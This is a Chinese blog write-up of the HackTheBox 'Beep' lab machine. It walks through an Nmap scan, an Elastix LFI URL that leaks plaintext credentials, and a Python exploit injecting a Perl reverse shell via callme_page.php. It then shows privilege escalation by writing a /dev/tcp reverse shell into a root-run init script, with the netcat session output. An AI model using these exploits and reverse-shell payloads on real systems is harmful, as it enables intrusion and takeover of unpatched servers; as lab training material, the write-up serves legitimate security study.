实战HackTheBox里面的Beep

最新推荐文章于 2024-06-09 21:43:53 发布
最新推荐文章于 2024-06-09 21:43:53 发布
阅读量1.5k 收藏
点赞数 1
分类专栏: 技术 文章标签: Hack The Box Beep 实战 安全 经验分享
文章由知柯®信安原创,转载请申明
本文链接:https://blog.csdn.net/qq_25879801/article/details/112488267
版权
本文介绍了作者在HackTheBox挑战中的实战经历,详细阐述了如何利用Elastix服务器的LFI漏洞获取Web界面凭据,通过callme_page.php页面的RCE漏洞获取shell,以及如何利用权限提升技术获取root权限的过程。
摘要由CSDN通过智能技术生成

与之前一样,第一步是运行Nmap扫描以识别正在运行的信息。

# Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) PIPELINING AUTH-RESP-CODE USER STLS UIDL APOP EXPIRE(NEVER) TOP
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CONDSTORE CATENATE ACL CHILDREN OK URLAUTHA0001 X-NETSCAPE LITERAL+ LIST-SUBSCRIBED LISTEXT IDLE MULTIAPPEND MAILBOX-REFERRALS QUOTA NAMESPACE UIDPLUS Completed ID ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte THREAD=ORDEREDSUBJECT SORT SORT=MODSEQ IMAP4 RENAME UNSELECT NO BINARY IMAP4rev1 ATOMIC STARTTLS
443/tcp   open  ssl/https?
|_ssl-date: 2020-08-23T10:30:15+00:00; +2m01s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/23%OT=22%CT=1%CU=43276%PV=Y%DS=2%DC=I%G=Y%TM=5F42455
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix
Host script results:
|_clock-skew: 2m00s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 06:30:49 2020 -- 1 IP address (1 host up) scanned in 384.20 seconds

从这里我们可以看到盒子上运行着许多服务。最值得注意的是SQL服务器,邮件服务器和PBX。我从浏览端口80开始,发现Elastix服务器软件正在运行。我尝试使用默认凭据登录,但未成功。

我做了一些Elastix的漏洞利用搜索。从登录页面很难判断哪个软件版本正在运行,所以很多都是反复试验。我发现这里有LFI漏洞利用程序,可让你查看amportal.conf配置文件。该文件包括elastix Web界面的纯文本凭据。可以通过以下链接进行浏览:

https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=…/…/…/…/…/…/…/…/etc/amportal.conf%00&module=Accounts&action

在此文件中,你具有以下文本块,其中包括用于登录到Elastix Web界面的登录凭据。

AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
vtigerCRM
adminL:jEhdIekWmdjE

接下来,我发现了这个利用利用callme_page.php页面中的$ to参数提供远程代码执行的漏洞。默认情况下,由于登录页面上的证书错误,此代码将不起作用。必须对其稍加修改以纠正此问题,同时还要修改lhost和rhost值。我还必须通过编辑/etc/ssl/openssl.conf接受TLSv1来降低Kali机器上的最低SSL版本。我还需要修改分机号以使其与Beep机器上的分机号匹配。可以通过登录Elastix Web界面,打开PBX选项卡并找到扩展名为233的用户名Fanis Papafanopoulos来收集这些信息。该漏洞利用代码最终如下所示:

import urllib
rhost="10.10.10.7"
lhost="10.10.14.29"
lport=443
extension="233"
# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)

然后,我在端口443上启动了一个netcat侦听器,运行了漏洞利用程序,并在侦听器上成功接收了shell。我使用python升级了shell,使之更加可行,然后能够浏览到fanis用户并捕获用户标志。

kali@kali:/etc/ssl$ sudo nc -lvp 443
listening on [any] 443 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.7] 59571
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ whoami
whoami
asterisk
bash-3.2$ cd /home
cd /home
bash-3.2$ ls
ls
fanis  spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat user.txt
cat user.txt
[REDACTED]
bash-3.2$

接下来,我们必须将特权升级为root用户。我运行“ ps aux”以查找当前正在运行的程序。以下程序以root用户身份运行时引起了我的注意,但是该文件属于并具有星号用户的写许可权。这使我可以修改文件,然后使其以root身份运行以生成根反向shell。

root      3571  0.0  0.1   4636  1168 ?        S    21:06   0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start

我首先使用以下反向shell修改了文件:

#!/bin/bash
bash -i >& /dev/tcp/10.10.14.29/2600 0>&1

然后,我在kali机器的端口2600上启动了一个netcat侦听器:

kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...

然后,我需要找到一种方法来启动elastix-updaterd进程。经过一番尝试和错误后,我发现通过elastix界面重新启动系统导致elastix-updaterd脚本以root用户身份运行。

重新启动完成后,在netcat侦听器上显示了一个shell。从这里,我确定它是一个根外壳,然后能够放置根标志。

kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.7] 47950
bash: no job control in this shell                                                                                   
bash-3.2# whoami                                                                                                  
root                                                                                                              
bash-3.2# cd /root                                                                                                
bash-3.2# ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
bash-3.2# cat root.txt
[REDACTED]
bash-3.2#

关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者

知柯信安
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
HackTheBox –Craft实战
weixin_45345568的博客
10-09 735
HackTheBox –Craft ip:http://10.10.10.110/ 信息搜集 端口扫描:使用nmap扫描发现开了22(ssh)端口和443(http/ssl) 版本可从web网页上获取: Web 服务器 Nginx1.15.8 Reverse Proxy Nginx1.15.8 首先访问页面,访问该链接http://10.10.10.110/看到是一片空白,试了一下使用https来进行访问,访问成功! 访问页面查看右上角的图标发现他有域名,所以使用hosts文件来进行绑定: 从上面图
HackTheBox-多种姿势渗透beep靶机
weixin_43111940的博客
04-19 343
端口信息 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) | ssh-hostkey: | 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA) |_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA) 25/tcp open s
HackTheBox::Beep
aya3t的博客
10-10 285
HackTheBox::Beep
Hack The Box(黑客盒子)Dancing篇
最新发布
轻舟已过万重山
06-09 789
在 Windows NT 中,它运行在 NBT(TCP/IP 上的 NetBIOS)之上,它使用著名的端口UDP 137 和 138以及TCP 139。在Windows 2000中,Microsoft添加了直接通过TCP/IP运行SMB的选项(TCP端口445),而没有额外的NBT层。--- 管理共享是由 Windows NT系列操作系统创建的隐藏网络共享,它允许系统管理 员远程访问网络连接系统上的每个磁盘卷。--- C:\磁盘卷的管理共享。--- 进程间通信共享。
hackthebox-beep(考点:elastix)
冬萍子癸水
04-10 390
nmap 很多端口,看到ssh想到登录。再看看80 打开是elastix 网上搜搜相关漏洞 https://www.exploit-db.com/exploits/37637 主要就是这个,以后看到elastix先来一发这俩。 https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc...
Hack the box靶机 beep
菜浪马废的博客
05-19 174
看看有没有漏洞可用 查看网页源代码 会让信息更立正 用得到的信息直连ssh可以获得root
Hack The Box】linux练习-- beep
人间体佐菲的博客
11-09 349
Hack The Box】linux练习-- beep
0x11-HackTheBox-Beep
0pr
05-26 372
目录 历史命令 目标 能学到什么? 什么是 Elastix? 什么是 FreePBX? Elastix FreePBX 远程代码执行漏洞 Nmap Rpcclient Smbclient Enum4linux Nmap Read More Ldapsearch Sambe on 139,445 Rpc DNS on 53 Kerberos on 88 Evil-winrm Foothold Privilege Escalation Manual Enumeration PowerView.p
Hackthebox---Craft
qq_37027540的博客
01-28 287
Hackthebox—Craft 获取内网ip 对靶机信息进行探测 发现443端口有web服务,访问页面 发现两个网址但是发现无法访问,没有dns解析服务器,修改/etc/hosts文件将网址域名与其对应的IP地址建立一个关联“数据库” 发现一个页面有一些API接口可以获得数据库中的信息,但是需要token才能使用,和一个gogs页面,上面部署了API接口实现的python脚...
Linux/Beep
ve9etable的博客
08-07 925
centos安装elastix2.4
luna33的专栏
05-23 2107
elastix 安装心得
第一章 网络安全实战入门 hack the box
qq_42676415的博客
04-24 641
这会下载一个后缀为ovpn的文件,这个文件就是链接hack the box 的网络文件。(3)输入openvpn (路径)文件名,然后回车开始链接hack the box 的网络。二、我们使用kali系统,这个可以安装虚拟机,网络上教程一大堆,不在手把手教。(不会安装,不知道如何在官网下载的可以私信我)(2)输入sudo -I 命令切换为超级管理员用户。我们利用hack the box 进行教学,官方网址。在终端显示如下后,刷新网页如下右边就是链接成功。三、链接hack the box 的网络。
Sqlmap使用教程【超全】
MickeyMouse1928的博客
05-11 7293
sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的sqlmap笔记发布上来供大家参考。   sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。2、基于时间的
HTB Beep[Hack The Box HTB靶场]writeup系列5
重新启程
02-04 3506
本题是retire机器的第五台了 目录 0x00 靶场信息 0x01 信息搜集 0x02 业务探测 80端口主页:elastix freepbx 80端口mail业务:roundcube webmail 10000端口:webmin 0x03 漏洞分析 elastix roundcube webmin 0x03 web攻击 roundcube webmin elas...
hackthebox --BountyHunter
weixin_47156475的博客
08-13 419
文章目录一、信息收集二、getshell三、提权总结 一、信息收集 先扫描一下,看看开启了哪些端口,哪些服务,以及哪些敏感目录 经过一番搜素以及检查,发现并不存在服务漏洞,也没有什么敏感的目录 于是扩大目录的扫描范围 : 发现一个叫db.php的文件以及一个叫resources的文件夹,访问resources文件夹的结果如下: db.php访问没有任何信息 于是老老实实地去80端口访问 到处点点点,然后发现了一个提交页面 抓包分析一下 data里面的数据是先base64加密,然后在url加密
HackTheBox-Knife靶场实战
qq_36584013的博客
05-26 600
HackTheBox-Knife靶场实战 靶场信息 信息搜集 首先使用nmap进行端口扫描 我们得知开启了22和80端口 出于能不爆破就不爆破的原则,先访问80端口看一下 80端口上的内容有点不明所以。 在完全没思路的情况下,尝试使用dirbuster工具进行了目录爆破,但四十分钟过去了却没有一丁点收获,连robots.txt页面也不存在。 我的思路就卡在这里了,一时之间不知道应该...
hackthebox-Bounty (考点:上传/IIS7.5安全/windows)
冬萍子癸水
04-16 422
nmap 就一个80,没啥别的,扫出来显示是iis7.5,说明很可能这就是个突破口&考点 因为是iis,所以对于asp&aspx文件是要重视的,在拿dirbuster扫时也要添加这俩后缀文件名 扫出 打开看第一个是上传,然后在第二个里读取 经验证,随便传图片,读取成功。那么突破思路就是上传了。 但我试了很多php和aspx,都没用,让人郁闷 只好搜iis7.5 rce up...
Hack the box靶机 Bounty
菜浪马废的博客
06-03 461
两个页面都是没有权限不能访问 但是也没有扫出来登录页面 投个图 他们换了本字典 我懒得扫了 有过滤 上传了一个shell.php.gif绕过了 找到一篇博客 上传.config 使用nishang的Invoke-PowerShellTcp.ps1的时候 需要在这个文件末尾加入调用 Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 443 然后就可以连接了 没有补丁 那ms15-051 完成 ...
端口占用或无权限:listen on 0.0.0.0:443 failed unknown system error 0
z1916047746的博客
10-29 2321
问题描述: 端口占用或无权限:listen on 0.0.0.0:443 failed unknown system error 0 原因分析: 本机电脑里的443端口号被占用,需要杀死占用该端口的进程程序。 解决方案: 1、按ctrl+r,输入cmd。 2、在命令控制符界面输入命令:netstat -aon|findstr “443”。找到对应端口的进程。如下图所示,找到对应的进程号是8768。我这里是跟443端口对应的ID,但是你们的电脑上不一定是,对应上就行。 3、按ctrl+alt+delete
winio beep
11-26
"winio beep"是在微软Windows操作系统中使用WINIO库函数来发出蜂鸣声的命令。WINIO库函数允许程序通过硬件接口直接访问计算机的输入输出端口,因此可以控制计算机的蜂鸣器发出蜂鸣声。这种命令通常用于在编程时测试...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

知柯信安

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值